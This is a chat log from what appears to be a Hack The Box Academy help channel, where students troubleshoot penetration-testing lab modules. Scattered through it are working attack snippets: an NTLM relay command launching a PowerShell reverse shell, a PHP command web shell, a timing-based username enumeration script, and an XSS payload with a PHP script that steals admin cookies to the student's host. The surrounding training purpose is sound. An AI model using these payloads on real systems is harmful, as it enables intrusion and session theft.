As jailbreaking a device you don't own is illegal

The answer is still no, read #rules

Not jail breaking I just got apps on it and have trouble opening them

I ain’t asking u

@fathom pendant lol u wanna have a look at it - its not bad i guess

Well if they're blocked you'll need to jailbreak to bypass features

No

Anyway I suggest you stop asking @stark edge

I’m going to ask again does anyone know how to open apps on Mac computer

<@&861185840277487616>

@stark edge No one will assist you in getting around your school security. As Marcie said, no one will assist. We are not that kind of server.

we don't help ppl bypass security measures put in by your organisation.

Please don't make me kick and ban you from the server.

Ok well on my personal mac I’m trying to open Microsoft edge and when I tap on it nothing pops up it just hides away

Sure, now its personal

lodge a ticket with microsoft help

Okay, well it doesnt deal with HTB Academy modules, so still irrelevent

But anyway take it up with your school staff/it

the audacity this guy has

But it’s my personal computer

And?

Still off topic

Either way, irrelevant to this chat

i can assure you that no one cares. we're not an IT help desk.

General doesn’t work for me

If you want to access more of the server read and follow #welcome and be mindful of #rules

Where would I go to get help for my mac problem

Not In this server

google it

Windows on mac

Like parralell

@stark edge Please stop. You've been asked several times.

I got another question though Fr Fr I have a vpn on chrome and it doesn’t seem to be working

Ive been looking through the help/man command for npm install and I see nothing related to web servers

all I understand is that its a package manager and I should be using the same structure as the previous commands ive used to create web servers( xyz install ...)

@surreal rain mind giving me a hint if your free?

linux fundamentals module - working with web services

https://www.npmjs.com/package/http-server

wait

When I learn from modules, am I supposed to be searching this stuff up

I assumed all the infromation id need would either be in the -help command or a hint i would have to gleam from previous modules

I wouldve had this module over with 4 hours ago

Sometimes you need to utilize uncle Google

^

If it's not found in --help or man pages, google

plus alot of the time youll be on google so its a good habit to use google for questions

Alright, thanks you both

Hello, I am currently subscribed to student plan. If I subscribe to the Platinum plan, can I switch back to the student plan before my platinum plan ends?

yes as long as you're still using the same verified account

Thanks

As long as a subscription is active, you cannot take out another subscription

As soon as the subscription has expired, you can change your subscription

Thank you very much

Hi, team!
Is there any issues with this lab? The machines cannot be spawned 😦
It took forever...

if you are having spawn issues, try switching VPN regions or contacting support

Might be VPN issue? Ok, I'll try to change the region. Thank you!

I have enumerated MSSQL server and DC01 server, but I am not able to get a foothold on either of the machines. Can anyone give me a little nudge on the direction that I should be looking at?

Go through each of the sections methodically to move forward

I have managed to get a list of domain users, but they are a lot! Should I do password spraying against all of them? Or just the few ones whose naming looks different than the norm?

Got it!

When in doubt go through slowly

Can you elaborate a little more on what you mean by "go through slowly"?

try the techniques you have learned

MODULE : Whitebox Attacks
SECTION: Data Exfiltration via Response Time

My poc.py is working fine on my local machine but doesn’t work on the challenge instance, i tried many variations of the THRESHOLD_S and still can’t identify a user on the remote system:

||import requests
url = "http://94.237.59.193:35162/filecheck"
wordlist= "xato-net-10-million-usernames-dup.txt"
THRESHOLD_S = 1
cookies = {"session":"eyJsb2dnZWRfaW4iOnRydWUsInVzZXIiOiJodGItc3RkbnQifQ.Zp9Hgw.9-9S6E4lOWyadoaB5GXYbvJ2AWM"}

proxy = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}

with open(wordlist, 'r') as file:
for usernames in file:
usernames = usernames.strip()

    res = requests.get(url,params={"filepath":f"/home/{usernames}/"},cookies=cookies)
    if res.elapsed.total_seconds() > THRESHOLD_S:
        print(f"valid username in the file system is: {usernames}")||

Edit: the author of the module replied and the challenge should be updated.
Thanks @upper haven

I had the same issue, the timing was a pain, took a few attempts. It helped me to do this via a pwnbox

Hey, am on the Skills Assignment - Pivoting, Tunneling, and Port Forwarding. Am having trouble getting the lsass file from the Windows internal machine to transfer over to my kali thru an Ubuntu pivot.

Ive tried scp, smbserver, and thru rdp gui - all of them dont work 😦

I need some help with Linux Privesc - Logrotate (https://academy.hackthebox.com/module/51/section/1589)

I have compiled the exploit and run the exploit with the payload (and nc waiting for the revshell) but the log isn't rotating. The module tell's you to use /tmp/tmp.log but even after 15mins the logs haven't rotated (therefore the callback hasn't started).

any help on why my exploit isn't working would be great as i've definitely followed the isntructions.

I just tested it and I agree, the response timing is too sensitive. I'm gonna adjust the lab and push an update

Suggestion, just transfer to Ubuntu, then your machine. If you are using xfreerdp there's also the /drive: option

thats amazing

ive tried the /drive option but it doesnt work - it's stuck at 0% for a long time

have you altered the log? to trigger the rotation

Use tcp vpn

i am using tcp vpn

¯_(ツ)_/¯

Otherwise you'd need to port forward to transfer things directly

so i managed to find the right log, and then sometimes can trigger a logrotate, but twice now the revshell has connected but dropped before i can even put in a command

vautia is amazing 🙂
He really listens to all feedback and tries to implement it.

Anyone else having any issues spawning machines? I know there was just a critical outage a few minutes ago, says its resolved now

and sometimes the exploit will run, but will quit halfway through

I will retry this section on my vm when the update is pushed 👀

you have a short window to do it, suggestion is to try another way instead of rev shell

either suid binary or add the user to sudo group

Something went wrong
Error Code: 504

Our engineers have been notified and are working to resolve the issue.

Ray ID: ::RAY_ID::

in https://academy.hackthebox.com/

it's back, refresh the page

👍

got the flag in the few seconds i had with a shell haha. but now the page on academy won't accept it and is taking a while to load..

i did ping my VM from the attacked host and got 300ms and it was stable. so its a weird issue to have...

it was down for a min but should be back now

Website still not working or spawning machines. Error 504 still

Website and spawning machines.

It is working here, but kinda slow

it finally accepted the flag. and i guess the current issues made the shell a bit hit and miss .... lol

I just came across ja3 in the Working With IDS/IPS module and am trying to install it on my kali machine to play around with it some more.
It does not appear to be available through apt so I tried grabbing the go version from https://github.com/dreadl0ck/ja3. I grabbed it with wget in terminal and am unsure where to go from there. Do I need to do something with go to make it an executable and then add it to $PATH?
The machine we ssh into in the module has it added to path.
I was also a bit confused by the space that appears to be at the end of the ja3 folder from the wget https://github.com/dreadl0ck/ja3. The same space exists after ja3 on the machine we ssh into.

is there any issue at this moment with the HTB academy main page?

Yes, it's down

y0y0 thank youuuuu

time for some gaming :D

Is there any info on when the platform will be back up?

#general message

thanks, had missed that one

No worries 🙂

I hope it gets fixed soon too

is it related to #710108839063846964 message as well?

I am not sure, but most likely that will be connected

alright, thanks for your time 😉

academy seems to be back up for me

@tardy jungle @storm elk The lab is updated now 🙂 For reference: For me it took about 5 mins to find the solution, producing 5-10 false positives in the process. It's still not ideal but timing attacks are inherently prone to false positives. For the purpose of the section it should be fine now, it's significantly more reliable. Please try again @tardy jungle and let me know if you face any issues. Make sure to figure out a correct value for the threshold using the known user htb-stdnt. I don't know how this one slipped past me when creating the module. Sorry for any frustration this has caused.

okay Academy is hating me again

its down for me too....

ig its down

I can't spawn to the target system, is it a general issue?

may I dm you regarding this? 🙂 I tried a higher timing, and the solution doesn't show the correct username 😅 pwnbox in DE location

#general message

Are you still facing this?

Cloudflare seems to be checking my connection a lot 👀

did you finally do it? if not, can you share more details? (link)

Hello, can anyone help me explain something to me, from Firewall and IDS/IPS Evasion - Hard Lab.

I am currently doing Information Gathering Web Edition in Fingerprinting. I have to find the OS for vhosts provided an IP. to check the IP i pinged it but it was down, i checked the traceroute and it seems I am hitting the gateway 10.10.16.1, but after that I can't hit the server, I also put the domain with IP in /etc/hosts, but as I can't reach the server it is not giving me any benefits. Am I missing something? I would be glad for any hint/help

why?

it thinks I am a bot

same for me, google thinks that. BUT Sir I'm a real Human.

you're not alone, we're all bots

#general <----

Is the provided IP a public ip?

Ip:port?

has anyone had issue with brute forcing ssh in easy lab of password attacks? i thought the logins are usually early on in the lists but hydra has been going for 45 mins now 😛

Guys if you have issues the last hour, spawning targets in academy and if you are getting some 403 in network tab of devtools, then refresh the page and check again. It's a **temporary **issue cause of cloudflare high level of bot validation. It will stop asap when network is stable

Hey guys, module Web attacks, bypassing basic authentication.... i have found few methods which dont get blocked but, i get a blank page after i use it, any encounter this? am i missing somthing

Hi guys. it might be just me but I am finding a small part of the Attacking SMB section a little confusing

`We can create a PowerShell reverse shell using https://www.revshells.com/, set our machine IP address, port, and the option Powershell #3 (Base64).
Attacking SMB

maqbull@htb[/htb]$ impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c 'powershell -e <HASH>

Once the victim authenticates to our server, we poison the response and make it execute our command to obtain a reverse shell.`

Specifically the above. when it says we poison the response. Doesn't this mean we are relaying the user's hash to the target server the user is trying to authenticate to ? In this case the target specified by -t is the server the user wants to auth to. But we hijack the creds and complete the authentication to the server, additionally getting the server to run a revshell for us?

so it's not really a response to the user

also the ip address in this example is different from the target in the previous example: which was:

impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146

oh god a wall of text

ntlmv2 uses a challenge and response mechanism, so there will be multiple exchanges before it's properly authenticated

Hello, I have a problem in the Windows Lateral Movement module in the WSUS Section Lab. Can anyone help me? Thank you

what's the problem?

my bad i edited

When I try to run SharpWSUS.exe I got error

run as admin

I did it

fair. but... the reverse shell is still as a result of the relaying of the creds we capture from the user to the target server. And not as a result of us poisoning a response to the user. or i am missing something

are you running it on the right host? if yes then reset the target and try agian

responder is doing the posioning

I am running it from SRV01

ok I got it thanks

Hey! I got stuck at the web proxies module at running tools through proxies because I can't set a proxy in msfconsole

These are my settings

Proxies HTTP:127.0.0.1:8080

RHOSTS IP

RPORT PORT

And in zap I have local proxy on 127.0.0.1:8080

OK. i think my contention is that the sentence seems to imply the the rev shell is as a result of a poisoned response to the user. However in fact the reverse shell is a result of relaying the hash to a target server and executing the rev shell there. Or am i misunderstanding

Any idea?

you won't receive a ntlm auth to relay if you don't posion

so it's the result of both posioning and relaying

ok thank u

and by poisoning we mean that we respond to a request for a share or resource that does not exist

i.e. we do the challenge response bit

responder does LLMNR, NBT-NS and MDNS posioning

effectively this is a Mitm

yes

ok... but what do we mean by "poisoning"

aren't we just completing the challenge/response with the user as normall

then replaying that to the target

posion the request so that an authenticaiton will be sent to a host that you control in the first place

How long does it take to download the patch on dc01?

you're misunderstanding challenge/response part, it's done between the posioned host and the target, your host does neither challenge or response, it just relays the requests

ah yes of course

I waited for 10+ mins

that's passive

ok, thanks

why would you want to use msf through zap?

so we can poison the request from the initial user? to make it so the user is requesting a non-existent resource to which we can respond to and then forward to the target server

ok, apparently I had to open the built in browser to fix it, I have no idea why, any ideas? Thanks :)

Because it's a requirement in the course

because i thought we have to rely on the user requesting a nonexistent resource for us to be able to respond

respond to the multicast query from the victim

no, you just need to relay the ntlm authentication request

there's also a ntlm relay module that goes into details

right.... so we don't "poison" any response. we just respond from our illegitimate smb server for a nonexistent resource the user is requesting. Taking advantage of the fact that user is not authenticating servers that respond

thanks for ure patience

i believe i get it

i just find the wording a bit confusing

the point of posioning is so that you have a ntlm auth to relay with, hosts won't just request auth to any IPs, so it will either have to be posioned, coerced or if you have controlled a know smb server in the network and relayed from that host

It's just that when we talk about an arp cache poisoning for a MITM. We actually have to take some poisoning action such as flooding or being quicker with our arp response in order to poison the user's cache.

i don't get how we poison the victim machine to allow us to respond

i understood that we wait for a user to request something that doesn't exist and hence we have the opportunity to respond where other servers won't

but i think we beat it to death already. it's clear i need to read more on how the ntlmrelay is doing poisoning

thank u

hello

everyone is the academy down

it seems to be online here

what error are you getting?

kepps reloading from the morning

try clearing your cookies, that might help

#modules message

can I have some cookies

oh wait this isn't gen chat

😄

go ask Ciara

Anyone able to help?

Have you clicked Using System.Windows.Data; (from PresentationFamework) ?

yup, clicked it but nothing changed

and you're sure you selected the right project type when creating it?

yup, C# console app

try console app (.net framework)

nevermind, this was the issue i chose the one without the (.net framework)

thanks

glad I could help 😄

Hello, everyone!

I am on https://academy.hackthebox.com/module/54/section/490 right now and I have a problem with reaching http://admin.academy.htb:PORT and http://admin.academy.htb:PORT/admin/admin.php

In the module don't have to access it, but ffuf results has only the errors. I assume that these problems are connected.

Does anyone can help me?

What error are you having?

Have you added the IP address to your hosts file?

there is no error in response

could someone assist "Intermediate Network Traffic Analysis" -> funky_dns.pcap?

yes

The modules before this one, I have no issues to reach need hosts...

well looks like you didn't add that vhost to your hosts file

Maybe the IP has changed in the new section?

exactly my thoughts

I just tried it, works fine here

I've tried yesterday and today I've spawned a new one, remove olds from hosts and add the new one.

Double check that there is no typo or that you have accidentally switched up the host and ip

Mmm... How it should looks like in hosts file?

IP<space>HOST

so xx.xx.xx.xx admin.academy.htb

Does admin.academy.htb should be there also?

that seems to be the issue, the vhost is admin.academy.htb

you should also add the admin.academy.htb

ip host host

oh... Thanks, guys. Will try asap 🙂

good luck

It works. I re-read quickly the prev pages and there was an attention to add admin.academy.htb to hosts, but I've skiped it somehow.

Thanks for help once more 🙂

glad you got it working!

Good morning; I've recently been working through the SQL Injection Fundamentals and SQLMap Essentials modules. In both modules, after successfully running through the first examples that require exploiting the DB, all subsequent attempts fail, saying the DB isn't responding, the connection is reset, etc... I've tried resetting the target box, coming back another day, but to no avail. I'm running this from my personal Kali VM. Any clues?

Have you connected via the vpn?

I have, yes

can you show the error you get?

I'm unable to upload an image in this channel, maybe I missed something along the way?

You need to get verified. See #welcome for instructions, but feel free to send it do me in DM 🙂

ha, I'll do that...DM'ing you real quick

In Introduction to Windows Command Line Module,User and Group Management. The exercise is to get the specific domain user surname So i tried to use Get-ADUser but its showing "server has rejected the client credential". Any help please?

doesn't seem like you're using the right user for that query

ohh, sorry. i logged into the htb-student account instead of the target account.

https://i.imgur.com/a4CMo95.jpeg
I don't get it.
Why is tcpdump can't read it?

https://i.imgur.com/tbvgojY.jpeg
Besides, it looks like Pwnbox in the free plan still can't download the file.

To be able to post pictures, your user must be verified. Read and follow #welcome

its obvious, look at the error and specify the correct path.

you're in your home folder, change to Desktop and try again

I need help on the Introduction to Digital Forensics, Skills assessment the last two questions. Any guide will be highly appreciated.

no its private and I don't really know how to access it. I always thought connecting to HTB vpn would connect me to their private servers like used here but it isn't case. And there is no port given

tks

anyone else felt like the sqlmap module was a bit rushed on the protection bypass section ? like when it came to bypassing protections, they did not really explain much. Are we just supposed to progressively throw protection bypasses until one sticks ? Like I understood their use, but the module does not seem to explain how to enumerate if an application is vulnerable to an sqlmap bypass.

And even the assessments at the of the section basically told you when to use each bypass. "use this bypass because this app is old", you did not actually have to figure out if the app was vulnerable to such bypass.

How can I get access to url of phishing xxs section task that will take credentials from victim

Hi, I am working on Linux Privilege Escalation Skills Assessment. I am at the Flag5 and stuck for a few days. I got the reverse shell and did the exploit from GTFOBins but it did not give me the root shell. I also tried to upgrade the shell but did not help. Can someone give me a guildance of how to tackle this last flag please? (https://academy.hackthebox.com/module/51/section/480)

Cross site scripting

What have you tried/where are you stuck?

Can anyone help me to get back my Instagram account

We can not help you with this. Contact instagram support

Module: Web Proxies
Section: Repeating Requests (https://academy.hackthebox.com/module/110/section/1051)

In the HTTP request, the ls -a command is being injected. Can someone please tell me why the value of ip is set to ls+-a and not ls -a?

• for space

What encoding is that? If that's even the right term, please correct me if it isn't.

url encoding

Wasn't %20 or something "space" in URL encoding? Am I mixing something up?

Url encoding indeed

https://developers.google.com/maps/url-encoding

By popular convention, spaces (which are not allowed within URLs) are often represented using the plus '+' character as well.

They mentioned it, I just failed to have the patience and read on, my bad. @storm elk Thank you too!

I was not aware that + could be used to encode a space as well, always thought it was just %20. Good to know.

Why ptunnel-ng don't work in an attacking machine?

include the module and section as mentioned before

Module: Password Attacks
Section: Hard Lab (https://enterprise.hackthebox.com/academy-lab/8728/6841/modules/147/1356)

Just really need a sanity check that this isnt the password for the encrypted hard drive on the hard lab for pasword attacks. Using the mutated password list, it came up with a password but it didnt work.

Password: || 123456789! ||

It is indeed

find a tool to access the drive 😄

i used guestmount

hey guys, very quick general question. When I establish an ssh connection to a module on HTB, is it usually a slow connection? For example, a lot of my character inputs are highly delayed which makes it difficult to navigate.

I used another one (dm if you want further hints :D, dont wanna spoil too much over here)

you can try switching VPNs and see if your latency changes

Hey, I'm doing the IPS/IDS hard lab from the Network enumeration with nmap module, and I'm having some issues, I want to ask how much time is too much time waiting for a scan (I want to try slower scans so I can maybe get an answer from a port I don't know), I have tried a -t2 scan on top 1000 ports to test and it took 10 mins is that ok?

if not, message support

I mean Im using my own VM using the ovpn file. Is that what you mean?

yes, you can switch regions for your VPN connection

there is an option to do so near the bottom of the section you are working on

ok ill try

Evening, looking for a step for a hint with the Windows lateral movement module, stuck on the skills assessment trying to pivot off the first box.

delete the already built binary in ptunnel-ng/src then cd to ptunnel-ng/, run

sudo ./configure LDFLAGS=-static
sudo make

and copy the new binary over, it should have the size of 5083KB

have you gotten the first question?

Yes. I have creds for two users, and I've enumerated the internal network (I think). Stuck on the second, and I've tried a variety of methods to pivot with the second user's creds with no success.

check the hint and use nmap

I can see there's an IPv6 address for one of the servers, and there's service(s) available on IPv6 that aren't on IPv4, but the service(s) aren't liking the second user's creds.

thank you very much for your help. I just feel like the course is a little outdated. programs work Crooked or need to find another way.

Tried Nmap to enumerate the IPv6 address via ProxyChains with no joy... it's currently hanging as I type this. I've tried a couple of other network scanners on the first box and PS Test-NetConnection also

no nmap works, you just need to scan more ports

there's a ipv6 flag for nmap

how do I fix "no route to host" connection issue when connecting with ssh? Module - linux fundamentals Section - Find File and Directories

proxychains nmap -6 -sT -Pn || [dead:beef:df::3]|| is the Nmap command that's hanging

make sure you're using socks5, socks4 does not support ipv6

could anyone help me? 🙂

yup using SOCKS5. However, it sounds like I'm not being totally daft and on the right track and it's the server the IPv6 address belongs to that I need to pivot onto. I'll try and persevere getting Nmap working meantime, thank you.

you can also add the ip to your hosts file and use the hostname instead

Sure 🙂

On windows priv esc module, the windows server and skills assessment 1 targets have been down for a few days

So been asking in pro-labs about Dante, would be sweet to get some assistance.

Be patient 🙂

Hello there

in updated information gathering web edition skill assessment, when I use ffuf to enumerate vhosts against inlanefreight.htb domain, how is every subdomain in wordlists giving me status of 200?

hello, what should be added to the command to check all passwords against a single username and then moving on to the next username?

share which part and screenshot

there's an option for that, check netexec smb -h

cant seem to find it. I looked it up.

I think you should filter by size 120. idk which part is this

can i get help : What is the full subdomain that is prefixed with "web"?

Which module and section?

yeah i also checked, looks like there isn't an option. i was probably thinking of hydra which has the option to loop over usernames

INFORMATION GATHERING - WEB EDITION in Virtual Hosts

oh ok, thanks. looks like I got it confused as well then.

what is the option in hydra?

-u

i don't think hydra supports WinRM though

add ip and domain in /etc/hosts
and try to fuzz it with gobuster or ffuf
gobuster with a pattern worked for me

even if I filter it i can't understand how every subdomain is giving status 200. and after filtering it with 120 there is nothing left

oof.

bro share the module link like which part is it

https://academy.hackthebox.com/module/144/section/1311#questionsDiv

if someone already finished this module, please help!!

This should help you out

https://academy.hackthebox.com/module/51/section/467

please keep messages relevant to HTB Academy module content

https://www.freedesktop.org/software/systemd/man/latest/busctl.html
https://www.freedesktop.org/wiki/Software/dbus/

Read the above, run the command by itself and with flags, and see what it does. You can break out of it by following GTFO.
It may look weird once you get a shell, but keep going with it

Is there a way to speak to an administrator?

What is it about? I'm not an admin.

about me waiting 24 hours for some help?

in the support chat?

I mean did you open a ticket in the support chat?

there, here in the prolabs section as well. Hell I tried getting a ticket last week for support chat have nothing in my email

hey, how can i help you?

They seem to have raised a ticket on the platform. I'll take care of it.

Can you please DM me the email address?

alright, cool

@south bison

Use a different list

hey

how do i get roles? i cant seem to text in general

Read and follow #welcome

is that acc identifier thing not some secret key with which someone can access my account?

No, that token is only for Discord

damn cool

how do i get SERIOUS RULE BREAK in red

This role is used to alert the moderators

https://tenor.com/view/mulan-secret-no-wall-of-china-disney-gif-8478532

damn i got a cool thingy in front of my name, can ya'll see it

payload bunny excuse me

You can now access other channels 👍

I made tunell. why can't I connect through rdp now?

Use proxychains maybe

session closed or timed out

3rd screenshot

Looks like it's having issues staying connected

Failed to connect

I'm looking at your ptunnel logs brother

I use VM parrot os. Maybe need to use pwnbox?

Not required

Try changing vpn to tcp and connecting again

I honestly haven't used ptunnel, too much headache

Hey could anyone help me with proxychains and zap, it seems like it doesn't work

I have a noob question there is a private server I have to access, I am connected to HTB VPN 10.10.16.X, I can access the gateway of the server, but how will I access a server which is in 10.X.X.X

And the last exercise is to route connection through zap with msfconsole, but setting proxies to 127 0 0 1 8080 doesn't work

I spend days-weeks on installation-setting programs.

so like I want to jump from my given subnet to the subnet where server is located right? how?

Routing table sets it up

There is no subnet hopping

¯_(ツ)_/¯

Traffic through zap?

Huh?

At least in this context

Like, capture the request

thats the thing after my packets hit the gateway it dies so the gateway doesn't have it route table set correctly?

ok, nvm I said the stupidest thing ever

Message support

So, the module requires me to send the payload from msfconsole through ZAP and see the request (to provide an answer)
But it doesn't work

You are using the 'auxiliary/scanner/http/coldfusion_locale_traversal' tool within Metasploit, but it is not working properly for you. You decide to capture the request sent by Metasploit so you can manually verify it and repeat it. Once you capture the request, what is the 'XXXXX' directory being called in '/XXXXX/administrator/..'?

Did you set the proxies option?

Yes

to http:127.0.0.1:8080

Also the exploit will fail

It's not meant to work

Well, somehow it works for no reason

I don't get any errors lol

?

In msfconsole?

Yes, let me run it again and I'll send you the result

Btw you're just meant to hit a random website, I chose Google

Hey, I'm doing the IPS/IDS hard lab from the Network enumeration with nmap module, and I'm having some issues, I want to ask how much time is too much time waiting for a scan (I want to try slower scans so I can maybe get an answer from a port I don't know), I have tried a -t2 scan on top 1000 ports to test and it took 10 mins is that ok?

No

Also you don't need to do -t2

ok, I think it didn't work because I set rhosts as the target website from the section

Okok perfect

When I tried with google it worked for some reason

Thanks

Ye

sup everyone, can anyone tell me how to get the new content of the server side attacks? i own the module but how can i reset it to get the new one?

You cannot reset the module. However, you can read the text in the module and apply what you have learned in the lab.

Oh thanks dude

Do ssh passwords accept withespaces within?

Yes

If you're trying to pass the pw in the command line, instead of when it asks, you need to wrap it in quotes

thx

Hi

Yo I feel so dumb today

Hello

Just finished studying. How’s your day going?

You got this man 😌

All good. It’s 10pm so my day is over soon

I try to do AEN blind and I feel so dumb

Oh dang, it almost about time to sleep lol

I have to read the modules and realized I making so many mistakes

Yes. But let’s stick to module chat 🙂 if you want to talk in #general follow instructions in #welcome 😉

It won’t allow me to

I have gone through the files(json) in the target machine searched for any doc file but found none. I also downloaded the ones from VELOCIRAPTOR and searched them one by one for any sign of the doc file. For the second last question, I have tried some paths that I found but nothing is working so far

Follow the instructions in the #welcome channel

It keeps redirecting me here

Hello
I am new here. I have joined to the discord channel to solve a technical issues with modules. Does the channel have a tech. support or smt like this?

If it’s question about how to do something, this is the right place to ask 🙂

To determine how to do something, first, I need determine how to connect to the target machine. I cannot connect via rdp from my kali (remmina, xfreerdp) and via HTB Viewer in brows. In addition, nmap shows that rdp port is filtered. So how should I connect? 🧐

Reset the target if you're meant to rdp to it

Hi guys, just started HTBA.. so excited to learn everything!

I have a question: Can I personalize the workstations generated on the site?

No

You can download and run your own vm though; the workstation (pwnbox) is based off ParrotOS

Oh my bad
I have reconfigured vpn and it have worked

From your guys exp, it's better using pwnboxes or setup my own?

File uploads skills assesment done, that was rough!

Your own, file retention and customizability are big plusses

so, Kali linux is the one you guys use?

I use Parrot, some use kali

It's all preference really

nice, haven't heard about parrot yet, just Kali

I'm gonna take a look on Parrot

Parrot is what the in browser workstation is

Not understanding the skill assessment part of the new server-side attack? Is this intentional way of getting the answer? was very anti-climatic...

Im working in Zone Tranfers in the Information Gathering - Web edition module. and Its asking me to run a 'dig axfr' but everytime i run it i get timed out, servers could not be reached, or network unreachable errors. Could anyone help?

Despite being able to create a http server in my vm, npx http-server /home -p Does not qualify as an answer..?

@primal silo check that the @ sign is correct via rdp, i suggest using onscreen keyboard

oh okay

not working

pls help sm1

#cpts message

this is not working i think smthing wrong at the servers end i have resetted it many times

Module: File Transfers section: Windows File Transfers, Q2

What are you using for RDP?

windows default rdp client

i can connect to the server but the credentials are not working

Can't help with that I'm afraid, I used xfreerdp on a kali vm with those creds and it worked fine.

okay then

let me try with xfreerdp

well it worked with xfreerdp i dnt understand why it didnt work it windows rdp client

but whatever.. thanks

I had the same issue before and it would only connect with creds from terminal, wouldn't work when trying to put them in on the windows login. No idea why, You could try doing something like ACADEMY-MISC-MS02\htb-student and see if that works or some variation

dig axfr domain @ip

I am having an issue that I wanted to see if anyone else had and was able to fix. In the 'Upload Exploitation' section of 'File Upload Attacks' module one of the first things you are instructed to do is upload phpbash webshell into the provided web application (similar to the previous section). I am able to upload the smaller size files like the one line '<?php system($_REQUEST['cmd']); ?>' and successfully navigate to the location and use it as a shell. When I try (in my Kali VM or Windows main host) to upload the larger phpbash file it just hangs. Weirdest thing is if I use the pwnbox I have no such issue. Anyone have any idea why this might be happening, as I prefer to use my own VM if possible and it looks like I am going to need to be able to upload the larger files a few more times in the module?

It should be $_GET not $_REQUEST

Try changing mtu size to a bit lower and see if that fixes

Funny I didn't notice it but that is verbatim what they have in this section but I used one from previous section that used GET. This one hasn't given me any issues.

Ok let me give this a try thank you!

is Exploiting Web Vulnerabilities in Thick-Client Applications in scope for the CPTS?

No luck.

Another wrinkle, I just uploaded the phpbash.php to the web application via pwnbox and then was able to navigate to it no problem in my VM so there is an issue somewhere blocking the larger file uploads. The question is where and why?

anything taught in the course content should be considered in-scope for the exam

I am not sure why but going around my safe DNS using VPN fixes the issue. Maybe it is something else about using my VPN that fixed it but I can't think of what else that would change. Oh well. Problem solved. Thank you @fathom pendant for your suggestion!

CROSS-SITE SCRIPTING (XSS) Module

Section: XSS Discovery

Question: Utilize some of the techniques mentioned in this section to identify the vulnerable input parameter found in the above server.

Firstly, why can't I test multiple parameters on xsstrike?

python3 xsstrike.py -u http://83.136.254.167:32540/?fullname=a%26username=a%26password=a%26email=aa%40aa.aa

Secondly, I have used all payloads for XSS that are available through XSStrike but I don't get a hit on the vulnerable email parameter.
python3 xsstrike.py -u http://83.136.254.167:32540/?email=aa%40aa.aa -f /usr/share/seclists/Discovery/Web-Content/xss
Is there something wrong with my command? Any info would be appreciated

dont use that bs in my opinion

do the xss manually :) especially if ur just learning

The point of this section is to use the automation tool that is demonstrated. I already did it manually successfully on the email parameter

https://github.com/s0md3v/XSStrike/wiki/Usage

Looks like you didn't follow the instructions, my command is different and works

Can I DM u?

ok

Do you all connect to a VPN before connecting to HTB VPN?

no

I should say, should we?

it's just going to add latency, i would only do it if you have stability issues

Oh alright

Hi, when working through the modules in cpts, I am unable to access the cheatsheet which is provided at the beginning of each module, can anyone help me about that?

I got it. I am able to access it from another browser.

It does test and check each param

Thanks I forgot to put quotes over the URL

Ah

User error 🗿

Regarding https://academy.hackthebox.com/module/77/section/843
I managed to run the exploit in the pwnbox but couldn't do it with my own PC (Latest parrot OS) with exactly the same parameters, is there any reason for that (such as IP filtering etc)?

did you get any error? double. checkd the port?

I just checked on my vm and it seems to work, so just making sure you set the port right 🙂

I literally copy pasted the line I used to be sure for the exploit, rhosts, rport and just ran. I searched a bit and some users mentioned that they ran into the same issue. I also had the VPN set if that matters in anyway. Thank you for checking on your side though 🙂

This exercise is with a public IP, so I didn't connect to the vpn 🤔

have you tried respawning the target?

I tried that first actually. Then I ran the xploit on my PC -> not working; moved to the pwnbox to check -> working; Tried again on my pc to be sure -> not working

Would it have anything to do with the msfconsole version used or script version itself?

did you run msfconsole as root?

This didn't make a differrence for me, but still

I tried that too using 'sudo' as it was one of the thing I found online too

it works fine on your own box, so you probably missed something or didn't set it up right

the most common issue i see with that is picking the wrong exploit

Here is a screenshot with the IP at the bottom and what I set. I also used the "show solution" explanations jsut to be sure

That actually looks correct to me

i didn't make notes for that module, but i thought it was one of the eternalblue exploits you had to use. i don't think you're using the right exploit.

i could be wrong though

It’s the correct one, I just checked

Note to add:

• I tried msfconsole from zsh with and without sudo
• I also tried from bash (thinking that zsh would get in the way) with and without sudo and obtain the exact same result

oh ok, weird the section just talks about eternalblue only

yeah its not EB i guess

Yeah. But when you spawn the target and visit the webpage it tells you which module it used

ya i know. the hint shows its not eb

Are the same version of msfconsole present in the pwnbox and Parrot 6.1 the same? At least the Major?

What happens if you proxy it through burp? What’s the response of the server?

I’m not sure about that

Burpsuit CE?

Yes

I have just started Burp CE with proxy through the integrated chromium and do have access tot he website without any issue

You can set msconsole to send it through burp

set PROXIES HTTP:127.0.0.1:8080

Then run your exploit again and you should see some input in burp

I run it once like this. Then I set "intercept response from this request" for the second time and did not receive anything

Try to disable intercept, then it will just do its thing

And you can view the request and response in the HTTP history tab

I am located in Japan, would that be an issue when it comes to that timeout?

That’s odd indeed. Might be worth asking support for help

You can contact them via the green box on Academy

https://academy.hackthebox.com/achievement/1346583/51

That too way longer than I wanted .... lol

Ok will do. Thank you very much for time and support! Really appreciated it!

You’re welcome. I’m sorry I couldn’t be of any more assistance

It's ok, you were very kind and did your best. I have just contacted the support and gave them a link to our chat. Thank you again for your time!

CROSS-SITE SCRIPTING (XSS) Module

Section: Session Hijacking
Try to repeat what you learned in this section to identify the vulnerable input field and find a working XSS payload, and then use the 'Session Hijacking' scripts to grab the Admin's cookie and use it in 'login.php' to get the flag.

My command which works and a request is sent to my server:
"><script src=http://10.10.15.114:80/index3.php></script><script>$.getScript("http://10.10.15.114:80/index3.php")</script>

This is the php script for index3.php:

if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "10.149.248.249: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>

I get a request message alert but the index3.php is not getting the cookie. Is there anything I'm doing wrong? Thanks

Spoilers dude

hy im getting this error in Using web proxies - Proxying tools
$ proxychains curl http://127.0.0.1:8080
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
error: invalid item in proxylist section: https 127.0.0.1 8080

I have also edited /etc/proxychains.conf

You'll need to comment out the other proxychains options

Also http vs https type deal

invalid item https

http 127.0.0.1 8080

https 127.0.0.1 8080
this is what i changed

Don't add https line

ok

proxychains] Strict chain ... 127.0.0.1:8080 ... timeout
curl: (7) Failed to connect to 127.0.0.1 port 8080 after 0 ms: Couldn't connect to server

now what to do

Hi everyone

any hint for this

